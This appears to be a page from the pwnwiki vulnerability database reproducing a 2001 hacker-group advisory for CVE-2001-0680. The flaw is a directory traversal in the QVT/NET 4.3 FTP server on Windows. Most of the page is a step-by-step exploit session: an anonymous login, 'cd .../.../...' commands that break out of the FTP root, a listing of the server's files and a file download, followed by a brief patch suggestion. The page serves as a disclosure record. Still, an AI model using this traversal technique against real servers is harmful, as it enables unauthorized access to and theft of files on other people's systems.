Loading
0

CVE-2001-0680 Web目录遍历漏洞

免费、自由、人人可编辑的漏洞库

,

INFO


======================================================================

	      QVT/NET 4.3 FTP server Directory Traversal


Author: alt3kx! <email protected>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas wey!
======================================================================
------------------------=Brief Description=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug  allows  any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=Plataforms=-------------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=Summary=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



EXploit:


C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG... ...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system       246928  Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system            0  Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system            0  Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system      3209110  Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system      6330449  Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system            0  Jan 18 17:44 norton
drwxrwxrwx 1 nobody system            0  Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system            0  Jan 19 12:04 plugins

.
.
.
.

-rwxrwxrwx 1 nobody system            0  May  4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system            0  May  4 16:51 XXXX
drwxrwxrwx 1 nobody system            0  May  8 13:17 teens
drwxrwxrwx 1 nobody system            0  May  8 13:18 tmp
-rwxrwxrwx 1 nobody system          168  May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) 
(168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.



C:\>type raza-alt3kx.txt

Bug discovered by alt3kx! <email protected>


C:\>


-------------------------------=Patch=---------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files no compromise.

-------------------------=Company Compromise=--------------------------

Company:

http//www.qpc.com

免费、自由、人人可编辑的漏洞库--pwnwiki.com